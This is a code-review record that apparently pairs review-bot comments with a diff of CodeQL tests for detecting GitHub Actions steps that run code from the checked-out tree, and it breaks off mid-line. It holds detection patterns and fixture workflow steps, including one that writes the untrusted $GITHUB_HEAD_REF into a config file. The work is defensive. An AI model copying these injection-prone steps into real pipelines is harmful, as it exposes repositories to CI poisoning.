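Review bot: The new `gcloud\\s+builds submit` entry keeps a literal single space between `builds` and `submit`, while every other multi-word entry in this list was converted to `\\s+`, so a script with two spaces or a tab at that position would be missed. `gcloud\\s+builds\\s+submit` keeps the list consistent. It is also not obvious from the list why `sed\\s+-e` is included next to `sed\\s+-f`, since `-e` takes an inline expression rather than a file from the checkout; a one-line comment giving the reason for each non-obvious entry would help the next maintainer.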
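Review bot: Replacing the removed `go generate` and `go run` command entries with `(go)\\s+(generate|run)\\s+(.*)\\.go` narrows detection to invocations that name a `.go` file, so package-path forms such as `go generate ./...` or `go run ./cmd/tool` no longer match either model. Both forms run code from the checked-out tree, so this reads as a coverage regression rather than a precision fix. Keeping `go\\s+generate` and `go\\s+run` in `poisonableCommandsDataModel` alongside the local-script pattern would preserve the earlier behaviour; the removal itself is in the previous hunk of this file.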
@@ -27,3 +27,14 @@ jobs: - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: xvfb-run ./mvnw clean package + - run: echo "foo" && npm i && echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo `npm i` bar" + - run: dotnet test foo/Tests.csproj -c Release + - run: go run foo.go + - run: sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # not supported yet + - run: sed -f ./config.sed file.txt > foo.txt + - run: sed -f config file.txt > foo.txt + - run: echo "foo" | awk -f ./config.awk > foo.txt + - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index dc6b863d0b9..55105c39bdf 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected 
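Review bot: The fixture adds `echo "foo" | npm i | echo "bar"` twice in a row, so the second step exercises nothing new; a different separator was probably intended, for example `- run: echo "foo"; npm i; echo "bar"`, which the new suffix group accepts but no added line covers. The last added line, `gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo`, has no closing quote, which does not affect the match but reads as a typo. A negative case, such as a step whose script contains a word that merely starts with a command name (`antlr`, `makefile`), is also missing, and the expected output would then show whether the new pattern over-matches.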
@@ -17,4 +17,14 @@ | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c80dc006ce7..08f9136f2e5 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -63,7 +63,18 @@ steps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -109,7 +120,18 @@ runSteps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ 
github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -191,7 +213,18 @@ runStepChildren | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" 
config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -344,94 +377,138 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| 
.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat 